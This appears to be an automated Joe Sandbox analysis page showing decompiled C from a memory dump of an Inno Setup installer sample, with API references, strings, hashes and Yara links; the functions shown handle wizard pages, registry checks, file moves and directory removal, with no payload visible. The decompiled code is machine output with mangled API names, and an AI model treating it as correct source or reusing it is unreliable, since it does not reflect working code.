0x00465935
0x00465935
0x0046593c
0x0046593e
0x0046593f
0x0046597a
0x00000000
0x00000000
0x004659e3
0x004659e3
0x004659e5
0x004659e8
0x004659eb
0x004659f8
0x0046597c
0x00465985
0x0046599a
0x004659b5
0x004659bc
0x004659c1
0x004659c6
0x004659cb
0x004659d4
0x004659de
0x0046599c
0x004659a1
0x004659a6
0x00000000
0x004659a6
0x00000000
0x0046599a

Strings

Failed to proceed to next wizard page; showing wizard., xrefs: 004659B0
Failed to proceed to next wizard page; aborting., xrefs: 0046599C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: b32889eafa518636edf1481a1e413b1268c01dca1c7854c8fb8f8a2032cde678
Instruction ID: 12f780cdad0b4d58caf138ecabb8fdd147c45e571271fb7f9f82c046ceb579cc
Opcode Fuzzy Hash: b32889eafa518636edf1481a1e413b1268c01dca1c7854c8fb8f8a2032cde678
Instruction Fuzzy Hash: 8B31C470A04644DFD700FF65C841A9E77F5EB08714F5544BAF4049B792EB38AE04DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0045BC70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0045BC70(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v7;
				char _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v96;
				char _v356;
				char* _t47;
				intOrPtr* _t53;
				intOrPtr _t64;
				void* _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;

				_t71 = _t72;
				_t73 = _t72 + 0xfffffea0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_t67 = __ecx;
				_t53 = __edx;
				_t69 = __eax;
				_push(_t71);
				_push(0x45bdc8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73;
				E004075E4( &_v356, 0x103,  *__edx);
				E00402A64( &_v96, 0x4c);
				_v96 = 0x4c;
				_v92 = _a4;
				E0045BC20(_a12,  &_v12);
				_v84 = E00403880(_v12);
				_v68 =  &_v356;
				_v64 = 0x104;
				_v52 = E00403880(_t67);
				_v48 = E00403880(_t69);
				_v44 = 0x1804;
				_v36 = _a8;
				_v16 = GetActiveWindow();
				_v20 = E0041F0BC(0, _t53, _t67, _t69);
				_push(_t71);
				_push(0x45bdab);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73;
				asm("fnstcw word [ebp-0x2]");
				_push(_t71);
				_push(0x45bd77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73;
				_t47 =  &_v96;
				_push(_t47);
				L0042ED08();
				if(_t47 == 0) {
					_v7 = 0;
				} else {
					E004036A4(_t53, 0x104,  &_v356);
					_v7 = 1;
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x45bd7e);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x0045bc71
0x0045bc73
0x0045bc79
0x0045bc7a
0x0045bc7b
0x0045bc7e
0x0045bc81
0x0045bc83
0x0045bc85
0x0045bc89
0x0045bc8a
0x0045bc8f
0x0045bc92
0x0045bca2
0x0045bcb1
0x0045bcb6
0x0045bcc0
0x0045bcc9
0x0045bcd6
0x0045bcdf
0x0045bce2
0x0045bcf0
0x0045bcfa
0x0045bcfd
0x0045bd07
0x0045bd0f
0x0045bd19
0x0045bd1e
0x0045bd1f
0x0045bd24
0x0045bd27
0x0045bd2a
0x0045bd2f
0x0045bd30
0x0045bd35
0x0045bd38
0x0045bd3b
0x0045bd3e
0x0045bd3f
0x0045bd46
0x0045bd60
0x0045bd48
0x0045bd55
0x0045bd5a
0x0045bd5a
0x0045bd66
0x0045bd69
0x0045bd6c
0x0045bd71
0x0045bd73
0x0045bd76

APIs

GetActiveWindow.USER32 ref: 0045BD0A

Part of subcall function 0041F0BC: GetCurrentThreadId.KERNEL32 ref: 0041F10B
Part of subcall function 0041F0BC: 740BAC10.USER32(00000000,0041F06C,00000000,00000000,0041F128,?,00000000,0041F15F,?,00000000,00000000,021D2410), ref: 0041F111

745AB9A0.COMDLG32(0000004C,00000000,0045BD77,?,00000000,0045BDAB), ref: 0045BD3F

Strings

L, xrefs: 0045BCB6

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ActiveCurrentThreadWindow
String ID: L
API String ID: 1335379141-2909332022
Opcode ID: ecf978f4827b11bb04f2084caf94660ee70bc065349bedc72ebf10547b36dd6c
Instruction ID: a2c08d980698cb0919ee6141d3023aacd631446be3c8be5cf3a7e31e031b4df6
Opcode Fuzzy Hash: ecf978f4827b11bb04f2084caf94660ee70bc065349bedc72ebf10547b36dd6c
Instruction Fuzzy Hash: 3B313071D00648AFDF11DFA6C8519DEBBB8EF49704F0184BAE904E7741D7789908CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00447614 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00447614(intOrPtr* __eax, void* __ebx, char* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v9;
				char _v20;
				char _v24;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr* _t22;
				intOrPtr _t26;
				char* _t33;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				intOrPtr _t50;

				_t48 = _t49;
				_t50 = _t49 + 0xffffffb0;
				_v80 = 0;
				_v84 = 0;
				_t33 = __ecx;
				_v9 = __edx;
				_v8 = __eax;
				_push(_t48);
				_push(0x44799d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50;
				E00402A64( &_v76, 0x20);
				_v24 = E00403DEC(_t33);
				_push(_t48);
				_push(0x4476cc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50;
				if(_v8 == 0) {
					E00408DF0("NIL Interface Exception", 1);
					E00403264();
				}
				_push( &_v20);
				_push(0x800);
				_push(1);
				_push( &_v24);
				_push(0x48c738);
				_t22 = _v8;
				_push(_t22);
				if( *((intOrPtr*)( *_t22 + 0x14))() != 0) {
					E00408DF0("Unknown Method", 1);
					E00403264();
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x4476d3);
				_t26 = _v24;
				_push(_t26);
				L0042CD4C();
				return _t26;
			}

0x00447615
0x00447617
0x0044761f
0x00447622
0x00447625
0x00447627
0x0044762a
0x0044762f
0x00447630
0x00447635
0x00447638
0x00447645
0x00447651
0x00447656
0x00447657
0x0044765c
0x0044765f
0x00447666
0x00447674
0x00447679
0x00447679
0x00447681
0x00447682
0x00447687
0x0044768c
0x0044768d
0x00447692
0x00447695
0x0044769d
0x004476ab
0x004476b0
0x004476b0
0x004476b7
0x004476ba
0x004476bd
0x004476c2
0x004476c5
0x004476c6
0x004476cb

APIs

Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31

SysFreeString.OLEAUT32(?), ref: 004476C6

Strings

Unknown Method, xrefs: 0044769F
NIL Interface Exception, xrefs: 00447668

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: String$AllocByteCharFreeMultiWide
String ID: NIL Interface Exception$Unknown Method
API String ID: 3952431833-1023667238
Opcode ID: 00955ceeb01edf3d71f00c71a2a25e3169e22099ed4224b50dbaeebe39af9c6b
Instruction ID: 75ee3de3b4eb09a744b339f3b68f3b0eeefa561dd8d85ddf3ee963fe95453cb8
Opcode Fuzzy Hash: 00955ceeb01edf3d71f00c71a2a25e3169e22099ed4224b50dbaeebe39af9c6b
Instruction Fuzzy Hash: DE118470A046089FE714EFB98D51A6EBBADEB09704F91407AF500E7682DB7899048B69

Uniqueness

Uniqueness Score: -1.00%

Function 00488E18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00488E18(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v76;
				void* _v88;
				char _v92;
				void* _t19;
				intOrPtr _t25;
				intOrPtr _t37;
				void* _t43;

				_push(__edi);
				_v8 = 0;
				_t28 = __eax;
				_push(_t43);
				_push(0x488ebb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xffffffa8;
				_push(0x488ed4);
				_push(__eax);
				_push(E00488EE0);
				_push(__edx);
				E0040377C();
				E00402A64( &_v76, 0x44);
				_v76 = 0x44;
				_push( &_v92);
				_push( &_v76);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t19 = E00403880(_v8);
				_push(_t19);
				_push(0);
				L0040597C();
				_t46 = _t19;
				if(_t19 == 0) {
					_t25 =  *0x48dcf8; // 0x21ea6b4
					E00488D70(_t25, _t28, 0, __edi, __edx, _t46);
				}
				CloseHandle(_v88);
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E00488EC2);
				return E00403548( &_v8);
			}

0x00488e20
0x00488e23
0x00488e28
0x00488e2c
0x00488e2d
0x00488e32
0x00488e35
0x00488e38
0x00488e3d
0x00488e3e
0x00488e43
0x00488e4c
0x00488e5b
0x00488e60
0x00488e6a
0x00488e6e
0x00488e6f
0x00488e71
0x00488e73
0x00488e75
0x00488e77
0x00488e79
0x00488e7e
0x00488e83
0x00488e84
0x00488e86
0x00488e8b
0x00488e8d
0x00488e8f
0x00488e94
0x00488e94
0x00488e9d
0x00488ea7
0x00488eaa
0x00488ead
0x00488eba

APIs

6D747180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00488EE0,?,00488ED4,00000000,00488EBB), ref: 00488E86
CloseHandle.KERNEL32(004896D8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00488EE0,?,00488ED4,00000000), ref: 00488E9D

Part of subcall function 00488D70: GetLastError.KERNEL32(00000000,00488E08,?,?,?,?), ref: 00488D94

Strings

D, xrefs: 00488E60

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseD747180ErrorHandleLast
String ID: D
API String ID: 2724671464-2746444292
Opcode ID: 8393a0934cf409fdf5fa70babbd1ed081a6c0bd6b2e1b0128785313a2f2fe55b
Instruction ID: 89e5725a2bbae99a59cd8131585feaea870e94621b0a0e51939d519fec37c215
Opcode Fuzzy Hash: 8393a0934cf409fdf5fa70babbd1ed081a6c0bd6b2e1b0128785313a2f2fe55b
Instruction Fuzzy Hash: 68018EB1A00208AFDB04EBA5CC42FAF77ACDF48714F91043AF904E72C0DA785E008B68

Uniqueness

Uniqueness Score: -1.00%

Function 0042DCD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042DCD0(void* __eax, char* __edx) {
				int _v16;
				char _v20;
				long _t11;
				signed int _t12;
				signed int _t13;
				void* _t17;
				char* _t18;
				int _t19;

				_t18 = __edx;
				_t17 = __eax;
				_t13 = _t12 & 0xffffff00 | RegQueryValueExA(__eax, __edx, 0, 0, 0, 0) == 0x00000000;
				if(_t13 != 0 && (_t18 == 0 ||  *_t18 == 0) &&  *0x48c0e0 != 2) {
					_t13 = 0;
					_t19 = 0;
					while(1) {
						_v16 = 2;
						_t11 = RegEnumValueA(_t17, _t19,  &_v20,  &_v16, 0, 0, 0, 0);
						if(_t11 != 0 && _t11 != 0xea) {
							goto L11;
						}
						if(_t11 != 0 || _v20 != 0) {
							_t19 = _t19 + 1;
							continue;
						} else {
							_t13 = 1;
						}
						goto L11;
					}
				}
				L11:
				return _t13;
			}

0x0042dcd6
0x0042dcd8
0x0042dceb
0x0042dcf0
0x0042dd04
0x0042dd06
0x0042dd08
0x0042dd08
0x0042dd24
0x0042dd2b
0x00000000
0x00000000
0x0042dd36
0x0042dd42
0x00000000
0x0042dd3e
0x0042dd3e
0x0042dd3e
0x00000000
0x0042dd36
0x0042dd08
0x0042dd45
0x0042dd4c

APIs

RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCE4
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DD24

Strings

Inno Setup: No Icons, xrefs: 0042DCE2

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Value$EnumQuery
String ID: Inno Setup: No Icons
API String ID: 1576479698-2016326496
Opcode ID: e6f2cafcd2158d22db2e0183f6e6d6a28307b949c1104728f216e9167eff6985
Instruction ID: 5f022ff61edbc863398efb603d9d0fe2d7b3fe45e9187fa50474e5a14cc2c627
Opcode Fuzzy Hash: e6f2cafcd2158d22db2e0183f6e6d6a28307b949c1104728f216e9167eff6985
Instruction Fuzzy Hash: 1601D672F9973069F73045157D42B7B9A8CDBC2B60FA4453BF980ED2C4D69C9C04826E

Uniqueness

Uniqueness Score: -1.00%

Function 00451918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00451918(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v16;
				long _v20;
				char _t12;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t35 = _t37;
				_t38 = _t37 + 0xfffffff0;
				if(E00451338(__eax,  &_v16) != 0) {
					_push(_t35);
					_push(0x451979);
					_push( *[fs:eax]);
					 *[fs:eax] = _t38;
					_t12 = E00403880(__edx);
					L00405BE4();
					_v8 = _t12;
					_v20 = GetLastError();
					_t27 = _t12;
					 *[fs:eax] = _t27;
					_push(E00451980);
					return E00451374( &_v16);
				} else {
					_v8 = 0;
					_t6 =  &_v8; // 0x476ce0
					return  *_t6;
				}
			}

0x00451919
0x0045191b
0x00451933
0x0045193e
0x0045193f
0x00451944
0x00451947
0x0045194d
0x00451953
0x00451958
0x00451960
0x00451965
0x00451968
0x0045196b
0x00451978
0x00451935
0x00451937
0x00451989
0x00451992
0x00451992

APIs

6D2B69D0.KERNEL32(00000000,?,00000000,00451979,?,?,-00000001,?), ref: 00451953
GetLastError.KERNEL32(00000000,?,00000000,00451979,?,?,-00000001,?), ref: 0045195B

Strings

lG, xrefs: 00451989

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast
String ID: lG
API String ID: 1452528299-3317785604
Opcode ID: 52564bac2283b5bcff1430b21dfe32349ee7aa8b81a8df75ba34d8ddf9254a65
Instruction ID: a5dff42b6a37240672caba55b6751961c7d85e69e67c8b0bdda49b8fe4e901fc
Opcode Fuzzy Hash: 52564bac2283b5bcff1430b21dfe32349ee7aa8b81a8df75ba34d8ddf9254a65
Instruction Fuzzy Hash: DAF0F972A046047B9B00DB769C1159EF7ECDB4576171046BBFC04D3652E6385E04C59C

Uniqueness

Uniqueness Score: -1.00%

Function 0046CD70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0046CD70(void* __edi, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t2;
				void* _t10;
				void* _t12;
				void* _t18;

				_t18 = __edi;
				_t20 = _a4 + 0xfffffff8;
				if( *(_a4 + 0xfffffff8) == 0) {
					return _t2;
				} else {
					while(E00407064( *0x4ae048) == 0) {
						E0046CC20(0x41, 0x4ae048, "DeleteFile", _t18, _t20, __eflags);
						__eflags = 0x41;
						if(0x41 == 0) {
							E00408DC4();
						}
					}
					while(1) {
						_push(E00403880( *0x4ae048));
						_t10 = E00403880( *_t20);
						_push(_t10);
						L00405B7C();
						if(_t10 != 0) {
							break;
						}
						_t12 = E0046CC20(0x40, 0x4ae048, "MoveFile", _t18, _t20, __eflags);
						__eflags = _t12;
						if(_t12 == 0) {
							E00408DC4();
						}
					}
					return E00403548(_t20);
				}
			}

0x0046cd70
0x0046cd7d
0x0046cd83
0x0046cde1
0x0046cd85
0x0046cd9c
0x0046cd8e
0x0046cd93
0x0046cd95
0x0046cd97
0x0046cd97
0x0046cd95
0x0046cdbe
0x0046cdc5
0x0046cdc8
0x0046cdcd
0x0046cdce
0x0046cdd5
0x00000000
0x00000000
0x0046cdb0
0x0046cdb5
0x0046cdb7
0x0046cdb9
0x0046cdb9
0x0046cdb7
0x00000000
0x0046cdd9

APIs

Part of subcall function 00407064: 6D2B5F60.KERNEL32(00000000,0048D628,0048AE72,00000000,0048AEC7,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 0040706F

6D2B6060.KERNEL32(00000000,00000000,00000001,004AE064,?,0046D37E,?,00000000,0046D40D,?,00000000,0046D610,?,00000000,0046D66A), ref: 0046CDCE

Part of subcall function 0046CC20: GetLastError.KERNEL32(00000000,0046CD0C,?,?,?,004AE048,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0046CD93,00000001), ref: 0046CC41

Strings

MoveFile, xrefs: 0046CDA9
DeleteFile, xrefs: 0046CD87

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6060ErrorLast
String ID: DeleteFile$MoveFile
API String ID: 3664743183-139070271
Opcode ID: 59bbfcd1e12019aafa036ced362fa3d23e73dce5f23d291d9ede97de693f229d
Instruction ID: 116ae7122e16eeffd0fe3f5edb9bfe050114d9b59cb3f199bbaa8819a29534ef
Opcode Fuzzy Hash: 59bbfcd1e12019aafa036ced362fa3d23e73dce5f23d291d9ede97de693f229d
Instruction Fuzzy Hash: 07F0C27410015167DE10BA6AC8C26BA3B988F0138C710057BF8D06B3C3EA2DAC0187AF

Uniqueness

Uniqueness Score: -1.00%

Function 004513FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004513FC(void* __eax, void* __edx, void* __eflags) {
				char _v8;
				char _v16;
				long _v20;
				char _t12;
				intOrPtr _t26;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = _t33;
				_t34 = _t33 + 0xfffffff0;
				if(E00451338(__eax,  &_v16) != 0) {
					_push(_t31);
					_push(0x451459);
					_push( *[fs:eax]);
					 *[fs:eax] = _t34;
					_t12 = E00403880(__edx);
					L0040598C();
					_v8 = _t12;
					_v20 = GetLastError();
					_t26 = _t12;
					 *[fs:eax] = _t26;
					_push(E00451460);
					return E00451374( &_v16);
				} else {
					_v8 = 0;
					_t6 =  &_v8; // 0x476ce0
					return  *_t6;
				}
			}

0x004513fd
0x004513ff
0x00451414
0x0045141f
0x00451420
0x00451425
0x00451428
0x0045142d
0x00451433
0x00451438
0x00451440
0x00451445
0x00451448
0x0045144b
0x00451458
0x00451416
0x00451418
0x00451469
0x00451471
0x00451471

APIs

6D2B5F60.KERNEL32(00000000,00000000,00451459,?,-00000001,?), ref: 00451433
GetLastError.KERNEL32(00000000,00000000,00451459,?,-00000001,?), ref: 0045143B

Strings

lG, xrefs: 00451469

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast
String ID: lG
API String ID: 1452528299-3317785604
Opcode ID: 42ffd975cacce6a4d107661cd4fa8c50dc256aa67dd1171f17eb777f0ac6061f
Instruction ID: 21868bf4a472ad8ae2cbb550fea4e5d432e04634d3afd00749e19bb59f20dd47
Opcode Fuzzy Hash: 42ffd975cacce6a4d107661cd4fa8c50dc256aa67dd1171f17eb777f0ac6061f
Instruction Fuzzy Hash: 4EF04671A00708AFCB00EFB59C416AEB3ECDB0971571086BBFC04E3652E63C5E0489AC

Uniqueness

Uniqueness Score: -1.00%

Function 004518A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E004518A0(void* __eax, void* __edx, void* __eflags) {
				char _v8;
				char _v16;
				long _v20;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00451338(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4518fd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_v8 = RemoveDirectoryA(E00403880(__edx));
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E00451904);
					return E00451374( &_v16);
				} else {
					_v8 = 0;
					_t6 =  &_v8; // 0x476ce0
					return  *_t6;
				}
			}

0x004518a1
0x004518a3
0x004518b8
0x004518c3
0x004518c4
0x004518c9
0x004518cc
0x004518dc
0x004518e4
0x004518e9
0x004518ec
0x004518ef
0x004518fc
0x004518ba
0x004518bc
0x0045190d
0x00451915
0x00451915

APIs

RemoveDirectoryA.KERNEL32(00000000,00000000,004518FD,?,-00000001,00000000), ref: 004518D7
GetLastError.KERNEL32(00000000,00000000,004518FD,?,-00000001,00000000), ref: 004518DF

Strings

lG, xrefs: 0045190D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID: lG
API String ID: 377330604-3317785604
Opcode ID: 4dbe65fd7962dd966570b9307598dfc3e49d6bd10901cc5f3ecaabe58f81214d
Instruction ID: fd372614016f92b8602765992e25db59decb0be624fc526f4664f166cb4ccb8b
Opcode Fuzzy Hash: 4dbe65fd7962dd966570b9307598dfc3e49d6bd10901cc5f3ecaabe58f81214d
Instruction Fuzzy Hash: D8F04C71A00308AFCB00EFB59C5199EB7E8DB0831571046BBFC14E3652E6386F08C59C

Uniqueness

Uniqueness Score: -1.00%

Function 00402850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402850(intOrPtr __eax, intOrPtr* __edx) {
				char _v276;
				CHAR* _t5;
				intOrPtr _t10;
				CHAR* _t15;
				intOrPtr* _t16;
				void* _t17;

				_t16 = __edx;
				_t10 = __eax;
				_t18 = __eax;
				if(__eax == 0) {
					return E00403628(_t16, GetModuleFileNameA(0,  &_v276, 0x105), _t17, _t18);
				}
				_t15 = GetCommandLineA();
				while(1) {
					_t5 = E00402780(_t15, _t16);
					_t15 = _t5;
					__eflags = _t10;
					if(_t10 == 0) {
						break;
					}
					__eflags =  *_t16;
					if( *_t16 != 0) {
						_t10 = _t10 - 1;
						continue;
					}
					break;
				}
				return _t5;
			}

0x00402859
0x0040285b
0x0040285d
0x0040285f
0x00000000
0x00402878
0x00402884
0x00402886
0x0040288a
0x0040288f
0x00402891
0x00402893
0x00000000
0x00000000
0x00402895
0x00402898
0x0040289a
0x00000000
0x0040289a
0x00000000
0x00402898
0x004028a6

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,AUTOMATION,00000001,00000000,004316E4,00000000,0043173A,?,?,004314D0,00000001,00000000,00000000), ref: 0040286D
GetCommandLineA.KERNEL32(AUTOMATION,00000001,00000000,004316E4,00000000,0043173A,?,?,004314D0,00000001,00000000,00000000,?,00432170), ref: 0040287F

Strings

AUTOMATION, xrefs: 00402852

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CommandFileLineModuleName
String ID: AUTOMATION
API String ID: 2151003578-3270279633
Opcode ID: 69fe48077e5eb457855a331b81a617a190fffd8002b769d2dbe0990323bd62d9
Instruction ID: daee7366679174b5276f86a0a27228b54be5a9370ddee46f5c897b3a8adc4376
Opcode Fuzzy Hash: 69fe48077e5eb457855a331b81a617a190fffd8002b769d2dbe0990323bd62d9
Instruction Fuzzy Hash: C5F0E52B70061227D22071AE098576B21CD8BC4754F18423BB648F73C0EEFCCC41429F
